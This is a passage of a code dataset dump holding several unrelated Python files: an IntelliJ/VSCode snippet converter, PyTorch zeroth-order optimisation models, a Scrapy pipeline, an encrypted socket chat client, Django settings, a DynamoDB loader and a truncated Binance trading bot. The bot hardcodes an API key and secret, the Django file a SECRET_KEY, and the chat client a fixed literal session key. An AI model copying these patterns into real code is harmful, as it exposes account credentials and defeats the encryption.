# Dump into formatted JSON\n jsonString = json.dumps(self.document, indent=4)\n # Replace begining and and [] with {}\n jsonString = '{' + jsonString[1:-1] + '}'\n\n jsonFile = open(self.fpath, \"w\")\n jsonFile.write(jsonString)\n jsonFile.close()\n\n def parse(self):\n datafile = open(self.fpath, 'r')\n self.document = json.load(datafile)\n datafile.close()\n\n\nclass ArgParser(argparse.ArgumentParser):\n def error(self, message):\n stderr.write('error: %s\\n_____\\n' % message)\n self.print_help()\n exit(-2)\n\n def getValuesFromArgs(self):\n self.__init__(prog='convert_jc',\n description='IntelliJ XML <-> VSCode JSON converter')\n self.add_argument(\"-i\", \"--infile\", help=\"In file\", required=True)\n self.add_argument(\"-o\", \"--outfile\", help=\"Out file\", required=True)\n self.add_argument(\n \"-c\", \"--context\", help=\"Context (i.e.: PHP, JAVA_SCRIPT etc.)\")\n\n args = self.parse_args()\n\n xml = args.infile if args.infile[-3:] == \"xml\" else args.outfile\n json = args.infile if args.infile[-4:] == \"json\" else args.outfile\n direction = 1 if args.infile[-3:] == \"xml\" else -1\n\n return [xml, json, args.context, direction]\n\n\nif __name__ == \"__main__\":\n (xmldoc, jsondoc, context, direction) = ArgParser().getValuesFromArgs()\n intellij = IntelliJXML(xmldoc)\n vscode = VSCodeJSON(jsondoc)\n\n if direction == 1: # IntelliJ -> VSCode\n intellij.parse()\n vscode.create()\n\n for template in intellij.document.getElementsByTagName(\"template\"):\n name = template.getAttribute(\"name\")\n body = intellij.getBody(template)\n\n vscode.add(name, body)\n\n vscode.write()\n else: # VScode -> IntelliJ\n if context is None:\n print(\"Please provide context (i.e.: PHP, JAVA_SCRIPT etc.)\")\n exit(-1)\n\n vscode.parse()\n intellij.create()\n\n for k, v in vscode.document.items():\n intellij.add(context, k, v)\n\n intellij.write()\n","repo_name":"fredtux/IntelliJ_VSCode_Snippets","sub_path":"convert_jc.py","file_name":"convert_jc.py","file_ext":"py","file_size_in_byte":5753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"43025511128","text":"import torch\nfrom torch import Tensor, nn\nfrom torch.nn import Linear\nfrom copy import copy, deepcopy\n\nimport pdb\n\nEXTRACTED_DATASETS = ['birds', 'flowers', 'cifar10', 'pets', 'food101']\nNUM_CLASSES = {'birds':500, 'flowers':102, 'cifar10':10, 'pets':37, 'food101': 101}\nDATASETS = EXTRACTED_DATASETS + ['fmnist', 'year_pred']\n\n\ndef get_in_out_shape(dataset_name):\n if dataset_name in EXTRACTED_DATASETS:\n return (2048, NUM_CLASSES[dataset_name])\n elif dataset_name == \"year_pred\":\n return (90, 1)\n else:\n print(\"Not implemented yet.\\n in out shape\")\n\ndef get_criterion(dataset_name, reduction='mean'):\n if dataset_name in EXTRACTED_DATASETS:\n return torch.nn.CrossEntropyLoss(reduction=reduction)\n elif dataset_name == \"year_pred\":\n return torch.nn.MSELoss(reduction=reduction) \n elif dataset_name == \"fmnist\":\n return torch.nn.CrossEntropyLoss(reduction=reduction)\n \nclass EnhancedModel(nn.Module):\n \n def __init__(self, grad_mode, criterion, **kwargs):\n super().__init__()\n assert grad_mode in ['first order', \n 'zeroth order delta', \n 'zeroth order forward-mode AD',\n 'zeroth order bidirectional delta', \n 'zeroth order unbiased delta',\n 'temp']\n self.grad_mode = grad_mode\n self.criterion = criterion\n self.past_move = None\n self.acc_def = \"class number\"\n if 'zeroth order' in grad_mode:\n self.random_vecs = kwargs.get('random vecs', 100)\n device_name = kwargs.get(\"device name\", \"cuda:0\")\n self.device = torch.device(device_name)\n self.to(self.device)\n \n @staticmethod\n def average_models(model_1, model_2):\n sd_1 = model_1.state_dict()\n sd_2 = model_2.state_dict()\n \n averaged_sd = deepcopy(sd_1)\n for key in sd_1:\n averaged_sd[key] = (sd_1[key] + sd_2[key]) / 2\n return averaged_sd\n \n def get_sd(self):\n return self.state_dict()\n \n def compute_grad(self, Xb, yb, lr=None):\n assert self.grad_mode in ['first order', 'zeroth order forward-mode AD']\n \n self.zero_grad()\n outputs = self(Xb)\n loss = self.criterion(outputs, yb)\n# pdb.set_trace()\n loss.backward()\n actual_grad = [param.grad for param in self.parameters()]\n grad = torch.cat([gr.flatten() for gr in actual_grad], 0)\n if self.grad_mode == 'zeroth order forward-mode AD':\n y_vectors = torch.randn(self.random_vecs, *grad.shape, device=self.device) #, device=self.device\n efficiency = torch.matmul(y_vectors, grad)\n grad = torch.mean(efficiency.unsqueeze(1) * y_vectors, dim=0)\n return grad, loss\n \n def move(self, vector, lr):\n if self.past_move == None:\n self.past_move = vector\n next_move = 0.9*self.past_move + 0.1*vector\n params = torch.nn.utils.parameters_to_vector(self.parameters())\n torch.nn.utils.vector_to_parameters(params - (lr * next_move), self.parameters())\n self.past_move = next_move\n \n def evaluate(self, dataloader):\n model = self\n model_initial_training = model.training\n model.eval()\n\n total_loss = 0\n count = 0\n corrects = 0\n data_count = 0\n criterion = self.criterion\n result = {}\n\n with torch.no_grad():\n for data in dataloader:\n Xb, yb = data\n Xb, yb = Xb.to(self.device), yb.to(self.device)\n count += 1\n outputs = model(Xb)\n loss = criterion(outputs, yb)\n data_count += Xb.shape[0]\n total_loss += loss\n if self.acc_def == \"class number\":\n preds = torch.argmax(outputs, dim=1)\n corrects += torch.sum((preds == yb).float())\n else:\n corrects += torch.sum((torch.abs(outputs - yb) < 0.01).float())\n \n result[\"Loss\"] = float(total_loss / count)\n result[\"Accuracy\"] = float(corrects / data_count)\n model.train(model_initial_training)\n return result\n \ndef one_three_multiplication(one, three): #One.shape= (b), three.shape= (b, m, n). Returns the product of each number in one to each layer of three\n shape = three.shape\n temp = torch.diag(one) @ three.reshape(shape[0], -1)\n return temp.reshape(shape)\n \nclass LinearEnhancedModel(EnhancedModel):\n \n def __init__(self, in_out_dim, grad_mode, criterion, **kwargs):\n EnhancedModel.__init__(self, grad_mode, criterion, **kwargs)\n self.linear = Linear(*in_out_dim)\n if grad_mode != 'temp':\n self.dim = sum([p.numel() for p in self.parameters()])\n self.dataset_name = kwargs.get('dataset_name', None)\n self.criterion_non_reduce = get_criterion(dataset_name = self.dataset_name,\n reduction='none')\n self.to(self.device)\n \n def forward(self, Xb):\n return self.linear(Xb)\n \n def perturb(self, search_radiuses):\n perturbations, new_params = [], []\n vecs_count = self.random_vecs\n for i, param in enumerate(self.parameters()):\n stacked_parameter = (torch.t(param)).repeat((vecs_count, ) + \n (1, )* (len(param.size())))\n \n random_perturbation = torch.Tensor([]) \n random_perturbation = torch.randn_like((torch.t(param)).repeat(\n (self.random_vecs, ) + (1, )* (len(param.size()))))\n \n perturbation_amount = random_perturbation\n perturbations.append(perturbation_amount)\n perturbation_amount = (perturbation_amount.reshape(vecs_count, -1)*search_radiuses[:, None]).reshape(\n perturbation_amount.shape)\n\n new_params.append(torch.cat((stacked_parameter + perturbation_amount,\n stacked_parameter - perturbation_amount), dim = 0))\n return perturbations, new_params \n \n def compute_grad_zeroth_order_delta(self, Xb, yb, v):\n ## Perform local search\n search_radiuses = torch.ones(self.random_vecs, device=self.device)*v #\n perturbations, new_params = self.perturb(search_radiuses=search_radiuses)\n grad, loss = self.compute_average_grad(Xb, yb, perturbations, new_params, search_radiuses)\n return grad, loss \n \n def compute_grad(self, Xb, yb, **kwargs):\n if self.grad_mode in 'zeroth order delta':\n lr = kwargs.get('lr', None)\n v = lr / (self.dim + 6)\n grad, loss = self.compute_grad_zeroth_order_delta(Xb, yb, v)\n elif self.grad_mode in ['first order', 'zeroth order forward-mode AD']:\n grad, loss = super().compute_grad(Xb, yb)\n \n return grad, loss\n \n def compute_average_grad(self, Xb, yb, perturbations, new_params, search_radiuses):\n vecs_count = perturbations[0].shape[0]\n with torch.no_grad():\n X = self.batch_forward(Xb, new_params, vecs_count)\n \n losses = self.vector_batch_loss(X, yb)\n ratios = torch.div((losses[0:vecs_count] - losses[vecs_count:2*vecs_count]), 2*search_radiuses)\n avg_loss = torch.mean(losses)\n grads = []\n for u, param in zip(perturbations, self.parameters()):\n u = one_three_multiplication(ratios, u)\n mean_u = torch.mean(u, 0)\n grad = torch.t(mean_u)\n grads.append(grad.flatten())\n return torch.cat(grads), avg_loss\n \n def batch_forward(self, Xb, new_params, vecs_count):\n batch_size = len(Xb)\n# if self.dataset_name == \"mnsit\":\n# X = Xb.view(Xb.size(0), -1)\n# X = X.repeat(vecs_count*2, 1, 1)\n# X = torch.bmm(X, new_params[0])\n# X += new_params[1].unsqueeze(1).repeat(1, batch_size, 1)\n# X = F.relu(X)\n# X = torch.bmm(X, new_params[2])\n# X += new_params[3].unsqueeze(1).repeat(1, batch_size, 1)\n# elif self.dataset_name == \"year_pred\": ## Todo change this!\n# X = Xb.view(Xb.size(0), -1)\n X = Xb.repeat(vecs_count*2, 1, 1)\n X = torch.bmm(X, new_params[0])\n X += new_params[1].unsqueeze(1).repeat(1, batch_size, 1)\n return X \n \n def vector_batch_loss(self, X, y):\n X_shape = X.shape\n independent_vecs = X_shape[0]\n batch_size = X_shape[1]\n if(self.dataset_name == \"year_pred\"):\n reshape = (-1, )\n y = y.flatten()\n else:\n reshape = (-1, X_shape[2])\n X_2d = torch.reshape(X, reshape)\n y_repeated = y.repeat(independent_vecs)\n losses = self.criterion_non_reduce(X_2d, y_repeated)\n losses = losses.reshape(independent_vecs, batch_size)\n losses = torch.mean(losses, 1)\n return losses\n\ndef get_temp_state_dict(dataset_name):\n assert dataset_name in DATASETS\n \n if dataset_name in EXTRACTED_DATASETS + ['year_pred']:\n in_out_dim = get_in_out_shape(dataset_name)\n model = LinearEnhancedModel(in_out_dim=in_out_dim, grad_mode='temp', criterion=None)\n elif dataset_name == \"fmnist\":\n model = FashionMnistNet(grad_mode='temp', criterion=None)\n state_dict = model.state_dict()\n return state_dict\n\nclass FashionMnistNet(EnhancedModel):\n \n def __init__(self, grad_mode, criterion, **kwargs):\n super(FashionMnistNet, self).__init__(grad_mode, criterion, **kwargs)\n \n self.layer1 = nn.Sequential(\n nn.Conv2d(in_channels=1, out_channels=32, kernel_size=3, padding=1),\n nn.BatchNorm2d(32),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2)\n )\n \n self.layer2 = nn.Sequential(\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.MaxPool2d(2)\n )\n \n self.fc1 = nn.Linear(in_features=64*6*6, out_features=600)\n self.drop = nn.Dropout2d(0.25)\n self.fc2 = nn.Linear(in_features=600, out_features=120)\n self.fc3 = nn.Linear(in_features=120, out_features=10)\n self.to(self.device)\n \n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = out.view(out.size(0), -1)\n out = self.fc1(out)\n out = self.drop(out)\n out = self.fc2(out)\n out = self.fc3(out)\n \n return out\n\ndef get_model(dataset_name, grad_mode, **kwargs):\n assert dataset_name in DATASETS\n kwargs['dataset_name'] = dataset_name\n criterion = get_criterion(dataset_name)\n if dataset_name in EXTRACTED_DATASETS:\n in_out_dim = get_in_out_shape(dataset_name)\n model = LinearEnhancedModel(in_out_dim=in_out_dim, grad_mode=grad_mode, criterion=criterion, **kwargs)\n elif dataset_name == \"year_pred\":\n in_out_dim = get_in_out_shape(dataset_name)\n model = LinearEnhancedModel(in_out_dim=in_out_dim, grad_mode=grad_mode, criterion=criterion, **kwargs)\n model.acc_def = \"in neighbourhood\"\n elif dataset_name == \"fmnist\":\n model = FashionMnistNet(grad_mode=grad_mode, criterion=criterion, **kwargs)\n return model\n\ndef get_group_models(dataset_name, group, initial_state_dict, **kwargs):\n count, grad_mode = group['count'], group['grad_mode']\n models = []\n for i in range(count):\n if 'zeroth order' in grad_mode:\n if 'random vecs' in group:\n kwargs['random vecs'] = group['random vecs']\n model = get_model(dataset_name, grad_mode, **kwargs)\n \n model.load_state_dict(initial_state_dict)\n models.append(model)\n return models","repo_name":"ShayanTalaei/Hybrid-Decentralized-Optimization","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18529609857","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport datetime\nimport alibaba\nimport pymongo\nfrom scrapy import log\nfrom scrapy.conf import settings\nfrom scrapy.exceptions import DropItem\n \n \n #db.shop.ensureIndex({\"url\":1},{\"unique\":true,\"dropDups\":true})\n\nclass MongoDBPipeline(object):\n def __init__(self):\n self.server = settings['MONGODB_SERVER']\n self.port = settings['MONGODB_PORT']\n self.db = settings['MONGODB_DB']\n #self.col = settings['MONGODB_COLLECTION']\n connection = pymongo.Connection(self.server, self.port)\n self.db = connection[self.db]\n self.tables = {\"ShopItem\":\"shop\",\n 'GoodsItem':'goods',\n \"IndexItem\":'index',\n }\n \n def process_item(self, item, spider):\n err_msg = ''\n for field, data in item.items():\n if not data:\n err_msg += 'Missing %s of poem from %s\\n' % (field, item['url'])\n if err_msg:\n raise DropItem(err_msg)\n \n collection = self.db[self.tables[ item.__class__.__name__ ]]\n collection.insert(dict(item))\n # log.msg('Item written to MongoDB database %s/%s' % (self.db, collection),\n # level=log.INFO, spider=spider)\n return item\n","repo_name":"zhangzhenhu/scrapyc","sub_path":"server/projects/alibaba/alibaba/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"11899120396","text":"import queue\nimport socket\nimport threading as th\nimport utils.encryption as encryption\nimport utils.message2 as msg\nfrom utils.conf import get_path\n\n# import sky_client.utils.encryption as encryption\n# import sky_client.utils.message2 as msg\n# from sky_client.utils.conf import get_path\n\nclass MessageReceiver(th.Thread):\n def __init__(self, client, connection):\n super().__init__()\n self.daemon = True\n self.client = client\n self.socket = connection\n self.recieved_queue = queue.Queue()\n self.stop = False\n\n def run(self):\n # self.socket.settimeout(0.2)\n print('run')\n while not self.stop:\n try:\n #вставить Lock\n bl = self.socket.recv(4)\n leng = int.from_bytes(bl, 'big')\n message = b''\n left_to_read = leng\n while left_to_read != 0:\n to_read = 4096 if left_to_read > 4096 else left_to_read\n data = self.socket.recv(to_read)\n message += data\n left_to_read -= len(data)\n\n print('message recieved ok') if leng == len(message) else print('incomplete message recived')\n\n # while leng > 4096:\n # data += self.socket.recv(4096)\n # leng -= 4096\n # data += self.socket.recv(leng)\n if not message:\n break\n else:\n self.recieved_queue.put(message)\n self.client.new_message()\n except:\n pass\n\n\nclass MessageSender(th.Thread):\n def __init__(self, connection):\n super().__init__()\n self.daemon = True\n self.socket = connection\n self.send_queue = queue.Queue()\n self.stop = False\n\n def run(self):\n while not self.stop:\n if self.send_queue.not_empty:\n message = self.send_queue.get()\n # вставить Lock\n l = len(message)\n bl = l.to_bytes(4, 'big')\n self.socket.sendall(bl + message)\n\n\nclass Client:\n # инициализация клиента\n def __init__(self, host, port):\n self.server_address = (host, port)\n self.listener = None\n self.session_key_recieved_by_server = False\n self.cipher_rsa = b''\n self.authenticated = False\n\n # соединение с сервером, encryption, запуск получателя и отправителя сообщений в потоках\n def run(self, username='', password=''):\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #conn\n try:\n self.socket.connect(self.server_address)\n except TimeoutError:\n print('timeout error')\n except ConnectionRefusedError:\n print('connection refused, socket problem')\n\n # encryption dialog start\n public_key_binary = self.socket.recv(1024)\n self.cipher_rsa = encryption.generate_cipher_rsa(public_key_binary)\n\n #threads start\n self.reciever_thread = MessageReceiver(self, self.socket)\n self.reciever_thread.start()\n self.sender_thread = MessageSender(self.socket)\n self.sender_thread.start()\n\n self.session_key = b'Sixteen byte key'\n self.session_key_encrypted = encryption.generate_session_key(self.cipher_rsa, self.session_key)\n\n def send_auth_data(self, auth_message):\n auth_bmessage = auth_message.get_binary_json('utf-8')\n auth_message_encrypted = encryption.encrypt(auth_bmessage, self.session_key)\n self.sender_thread.send_queue.put(self.session_key_encrypted + auth_message_encrypted)\n\n def send(self, message):\n bmessage = message.get_binary_json('utf-8')\n encrypted_message = encryption.encrypt(bmessage, self.session_key)\n self.sender_thread.send_queue.put(encrypted_message)\n\n def send_file(self, encrypted_data):\n self.sender_thread.send_queue.put(encrypted_data)\n\n # разрыв соединения\n def disconnect(self):\n self.reciever_thread.stop = True\n self.sender_thread.stop = True\n self.socket.close()\n self.session_key_recieved_by_server=False\n\n def new_message(self):\n encrypted_data = self.reciever_thread.recieved_queue.get()\n if self.listener.waiting_file_flag:\n print(self.listener.file_data.name)\n file_path = get_path(self.listener.file_data.name)\n encryption.decrypt_file(encrypted_data, self.session_key, file_path)\n self.listener.new_file_recieved(file_path)\n else:\n bmessage = encryption.decrypt(encrypted_data, self.session_key)\n message = msg.GeneralMessage()\n message.make_from_binary_json(bmessage, 'utf-8')\n self.listener.new_message(message)\n\n\n\n","repo_name":"vsurguch/client","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12469443435","text":"from .base import *\n# from .secrets import *\n\n# GENERAL\n# ------------------------------------------------------------------------------\n# Configure the domain name using the environment variable\n# that Azure automatically creates for us.\nDEBUG = True\nALLOWED_HOSTS = ['127.0.0.1']\nSECRET_KEY = 'django-insecure-3%xzde#z7j5bx4m&m-7o050@e=$udh9xc_zz^g10-ecw9swi4w'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': BASE_DIR / 'db.sqlite3',\n }\n}\n\nINSTALLED_APPS = ['livereload'] + INSTALLED_APPS\nMIDDLEWARE = MIDDLEWARE + ['livereload.middleware.LiveReloadScript']\n","repo_name":"NightingaleV/sweeper-swift-parsing-web-app","sub_path":"settings/config/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"34191698991","text":"#!/usr/bin python3\r\n\r\nimport sys\r\nimport boto3\r\n\r\ndynamo = boto3.resource('dynamodb')\r\n\r\n\r\ndef no_quotes(s):\r\n return s.replace('\"', '')\r\n\r\n\r\ndef buildkey(data):\r\n parts = data.split(',')\r\n date = no_quotes(parts[0])\r\n home_team = no_quotes(parts[6])\r\n game_number = no_quotes(parts[1])\r\n return home_team + date + game_number\r\n\r\n\r\ndef load_file(path):\r\n table = dynamo.Table('diamond')\r\n with open(path) as gamelogs:\r\n for gamelog in gamelogs:\r\n log_row = {}\r\n log_row['item_key'] = \"game\"\r\n log_row['item_name'] = buildkey(gamelog)\r\n log_row['log'] = no_quotes(gamelog)\r\n table.put_item(Item=log_row)\r\n print(log_row['item_name'] + \":\" + log_row['log'])\r\n\r\n\r\ndef main():\r\n path = sys.argv[1]\r\n load_file(path)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"leemcknight/diamond","sub_path":"scripts/dynamodb/gamelog.py","file_name":"gamelog.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"31426077796","text":"import math\nimport time\nimport logging\nimport numpy as np\nimport pandas as pd\nimport pandas_ta as ta\nfrom binance.client import Client\n\n# All necessary plotly libraries\nimport plotly as plotly\nimport plotly.io as plotly\nimport plotly.graph_objects as go\nimport plotly.express as px\nfrom plotly.subplots import make_subplots\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\n\nfrom BinanceBot.reinforcement_learning_stock import StockTradingEnv\n\napi_key = 'hPZcl6C7b1NFfMNc2whnh2OSyxsWxyEIEP2mKDypUYDrG70eeB4rniELcx0KnAwD'\napi_secret = 'tF6fS7kskVztUbDA5jkXt8GAdXLoJ82C9BaspK0F9AbV2MuG2aGZOcLoboOOUgX6'\n\ncol = ['open_time', 'open', 'high', 'low', 'close',\n 'volume', 'close_time', 'quote_asset_volume',\n 'number_of_trades', 'taker_buy_base_asset_volume',\n 'taker_buy_quote_asset_volume', 'ignore']\n\nclient = Client(api_key, api_secret, testnet=True)\n\n\ndef preprossing(df, sma_short=5, sma_long=20, ema_short=5, ema_long=20, rsi_period=14, difference=1e-4):\n df = df.copy(deep=True)\n\n df['sma_short'] = df.ta.sma(length=sma_short)\n df['sma_long'] = df.ta.sma(length=sma_long)\n\n df['ema_short'] = df.ta.ema(length=ema_short)\n df['ema_long'] = df.ta.ema(length=ema_long)\n\n df['rsi'] = df.ta.rsi(length=rsi_period)\n\n df['single_rsi'] = df['rsi'].apply(lambda x: 1 if x < 30 else 0 if x >= 70 else -1)\n\n df['single_sma'] = ((df['sma_short'] - difference) > df['sma_long']).astype(int)\n df['single_ema'] = ((df['ema_short']) > df['ema_long']).astype(int)\n\n df['double_sma'] = (df['sma_short'] > df['sma_long']).astype(int).diff()\n\n adx = df.ta.adx(length=14, high='high', low='low', close='close')\n df['single_dmp'] = (adx['DMN_14'] > adx['DMP_14']).astype(int)\n\n required_col = ['open', 'high', 'low', 'close', 'volume', 'sma_short',\n 'sma_long', 'ema_short', 'ema_long', 'rsi', 'single_sma',\n 'single_ema', 'double_sma', 'single_dmp', 'single_rsi']\n # required_col = ['open', 'high', 'low', 'close', 'volume', 'rsi', 'single_sma', 'single_ema']\n\n return df[required_col]\n\n\ndef get_data(symbol, interval, sma_short=5, sma_long=20, ema_short=5, ema_long=20, rsi_period=14, limit=None):\n if sma_short > sma_long:\n print(\"sma_short must be smaller than sma_long\")\n return None\n\n if ema_short > ema_long:\n print(\"ema_short must be smaller than ema_long\")\n return None\n\n if rsi_period < 1:\n print(\"rsi_period must be greater than 1\")\n return None\n\n limit = limit if limit is not None else sma_long if sma_long > ema_long else ema_long\n\n col = ['open_time', 'open', 'high', 'low', 'close',\n 'volume', 'close_time', 'quote_asset_volume',\n 'number_of_trades', 'taker_buy_base_asset_volume',\n 'taker_buy_quote_asset_volume', 'ignore']\n\n df = pd.DataFrame(client.get_klines(symbol=symbol, interval=interval, limit=limit), columns=col)\n\n df['open_time'] = pd.to_datetime(df['open_time'], unit='ms')\n df['close_time'] = pd.to_datetime(df['close_time'], unit='ms')\n df = df.set_index('open_time')\n df = df.drop(columns=['close_time', 'ignore'])\n df = df.astype(float)\n\n df = preprossing(df)\n\n return df\n\ndef get_klines(symbol, interval, start, end,limit=1000):\n col = ['open_time', 'open', 'high', 'low', 'close',\n 'volume', 'close_time', 'quote_asset_volume',\n 'number_of_trades', 'taker_buy_base_asset_volume',\n 'taker_buy_quote_asset_volume', 'ignore']\n\n d = []\n for klines in client.get_historical_klines_generator(symbol, interval, start_str=start, end_str=end, limit=limit):\n d.append(klines)\n df = pd.DataFrame(d, columns=col)\n df['open_time'] = pd.to_datetime(df['open_time'], unit='ms')\n df['close_time'] = pd.to_datetime(df['close_time'], unit='ms')\n df['open'] = np.float64(df['open'])\n df['close'] = np.float64(df['close'])\n df['volume'] = np.float64(df['volume'])\n\n df = df.set_index('open_time')\n\n return df\n\ndef get_min_qty(symbol, multiplier=1):\n info = client.get_symbol_info(symbol)\n ticker = client.get_ticker(symbol=symbol)\n filters = pd.DataFrame(info.get('filters'))\n min_lot_size = float(filters[filters.filterType == 'LOT_SIZE']['minQty'].values[0])\n min_step_size = float(filters[filters.filterType == 'LOT_SIZE']['stepSize'].values[0])\n min_notional = float(filters[filters.filterType == 'MIN_NOTIONAL']['minNotional'].values[0])\n current_price = float(ticker['lastPrice'])\n\n qty = min_notional / current_price\n qty = math.ceil(qty)\n return qty * multiplier\n\n\ndef get_cash(asset):\n info = client.get_asset_balance(asset=asset)\n return float(info['free'])\n\n\ndef order(symbol, qty, type):\n try:\n if type.lower() == 'buy'.lower() or type.lower() == 'b'.lower():\n order = client.order_market_buy(symbol=symbol, quantity=qty)\n\n elif type.lower() == 'sell'.lower() or type.lower() == 's'.lower():\n order = client.order_market_sell(symbol=symbol, quantity=qty)\n else:\n print(\"Wrong order type\")\n return None\n return order\n except Exception as e:\n print(e)\n return None\n\n\ndef bot_binance_signel(df, symbol, asset_1, asset_2, stop_loss, take_profit, print_action, is_bought, profit,\n last_bought_price, last_max_value, multiplier=1):\n sma_single = df.single_sma[0]\n ema_single = df.single_ema[0]\n rsi = df.rsi[0]\n close_price = df.close[0]\n asset_1_cash = get_cash(asset_1)\n asset_2_cash = get_cash(asset_2)\n min_qty = get_min_qty(symbol,multiplier)\n # open_price = df['open'].values\n # high_price = df['high'].values\n # low_price = df['low'].values\n # volume = df['volume'].values\n\n if not is_bought and sma_single == 1 : # and ema_single == 1:\n if asset_1_cash > close_price: # check if you have money\n\n is_order_placed = order(symbol, min_qty, 'buy') # place Buy Order\n if is_order_placed is not None:\n is_bought = True\n last_bought_price = close_price # set bought price\n last_max_value = close_price # max price since bought, used for dynamic stop loss\n if print_action:\n print_and_log(f\"\"\"buy {close_price}, Min Qty: {min_qty} \"\"\")\n # print(\"buy\", close_price, \"Min Qty:\", min_qty)\n else:\n if print_action:\n print_and_log(f\"\"\"buy order failed {close_price}, Min Qty: {min_qty} \"\"\")\n # print(\"buy order failed\",close_price, \"Min Qty:\", min_qty)\n else:\n if print_action:\n print_and_log(f\"\"\"not enough money to buy Close Price: {close_price}, {asset_1}: {asset_1_cash} \"\"\")\n # print(\"not enough cash to buy\")\n\n elif is_bought and sma_single == 0: # and ema_single == 0 : # normal Sell\n if asset_2_cash > min_qty: # check if you have money\n\n if close_price > last_max_value: # update max value since bought, needed for dynamic stop loss\n last_max_value = close_price\n\n if close_price < (last_max_value * (1 - stop_loss)) or close_price > (\n last_bought_price * (1 + take_profit)):\n\n is_order_placed = order(symbol, min_qty, 'sell') # place Sell Order\n if is_order_placed is not None:\n is_bought = False\n value = (close_price - last_bought_price)\n profit += value\n\n if print_action:\n print_and_log(f\"\"\"sell {close_price}, Min Qty: {min_qty}, Profit: {profit} \"\"\")\n # print(\"Sell\", close_price, \"Min Qty:\", min_qty, \"Profit: \", profit)\n else:\n if print_action:\n print_and_log(f\"\"\"sell order failed {close_price}, Min Qty: {min_qty} \"\"\")\n # print(\"sell order failed\",close_price, \"Min Qty:\", min_qty)\n\n elif is_bought and \\\n (close_price < (last_max_value * (1 - stop_loss)) or\n close_price > (last_bought_price * (1 + take_profit))): # Emergencey Sell Stop Loss / Take Profit\n\n if asset_2_cash > min_qty: # check if you have money\n\n if close_price > last_max_value: # update max value since bought, needed for dynamic stop loss\n last_max_value = close_price\n\n is_order_placed = order(symbol, min_qty, 'sell') # place Sell Order\n\n if is_order_placed is not None:\n is_bought = False\n value = (close_price - last_bought_price)\n profit += value\n\n if print_action:\n print_and_log(f\"\"\"sell {close_price}, Min Qty: {min_qty}, Profit: {profit} \"\"\")\n # print(\"Sell\", close_price, \"Min Qty:\", min_qty, \"Profit: \", profit)\n else:\n if print_action:\n print_and_log(f\"\"\"sell order failed {close_price}, Min Qty: {min_qty} \"\"\")\n # print(\"sell order failed\",close_price, \"Min Qty:\", min_qty)\n\n else:\n if print_action:\n print_and_log(f\"\"\"not enough money to buy Min QTY: {min_qty}, {asset_1}: {asset_2_cash} \"\"\")\n # print(\"not enough cash to sell\")\n\n return profit, is_bought, last_max_value, last_bought_price\n\n\ndef bot_binance_rl(df, symbol, asset_1, asset_2, stop_loss, take_profit, print_action, is_bought, profit,\n last_bought_price, last_max_value, multiplier=1):\n sma_single = df.single_sma[0]\n ema_single = df.single_ema[0]\n rsi = df.rsi[0]\n close_price = df.close[0]\n asset_1_cash = get_cash(asset_1)\n asset_2_cash = get_cash(asset_2)\n min_qty = get_min_qty(symbol,multiplier)\n\n\n\n\n action = 0\n\n if not is_bought and action == str(1) : # buy\n if asset_1_cash > close_price: # check if you have money\n\n is_order_placed = order(symbol, min_qty, 'buy') # place Buy Order\n if is_order_placed is not None:\n is_bought = True\n last_bought_price = close_price # set bought price\n last_max_value = close_price # max price since bought, used for dynamic stop loss\n if print_action:\n print_and_log(f\"\"\"buy {close_price}, Min Qty: {min_qty} \"\"\")\n # print(\"buy\", close_price, \"Min Qty:\", min_qty)\n else:\n if print_action:\n print_and_log(f\"\"\"buy order failed {close_price}, Min Qty: {min_qty} \"\"\")\n # print(\"buy order failed\",close_price, \"Min Qty:\", min_qty)\n else:\n if print_action:\n print_and_log(f\"\"\"not enough money to buy Close Price: {close_price}, {asset_1}: {asset_1_cash} \"\"\")\n # print(\"not enough cash to buy\")\n\n elif is_bought and action == str(-1): # normal Sell\n if asset_2_cash > min_qty: # check if you have money\n\n if close_price > last_max_value: # update max value since bought, needed for dynamic stop loss\n last_max_value = close_price\n\n if close_price < (last_max_value * (1 - stop_loss)) or close_price > (\n last_bought_price * (1 + take_profit)):\n\n is_order_placed = order(symbol, min_qty, 'sell') # place Sell Order\n if is_order_placed is not None:\n is_bought = False\n value = (close_price - last_bought_price)\n profit += value\n\n if print_action:\n print_and_log(f\"\"\"sell {close_price}, Min Qty: {min_qty}, Profit: {profit} \"\"\")\n # print(\"Sell\", close_price, \"Min Qty:\", min_qty, \"Profit: \", profit)\n else:\n if print_action:\n print_and_log(f\"\"\"sell order failed {close_price}, Min Qty: {min_qty} \"\"\")\n # print(\"sell order failed\",close_price, \"Min Qty:\", min_qty)\n\n elif is_bought and \\\n (close_price < (last_max_value * (1 - stop_loss)) or\n close_price > (last_bought_price * (1 + take_profit))): # Emergencey Sell Stop Loss / Take Profit\n\n if asset_2_cash > min_qty: # check if you have money\n\n if close_price > last_max_value: # update max value since bought, needed for dynamic stop loss\n last_max_value = close_price\n\n is_order_placed = order(symbol, min_qty, 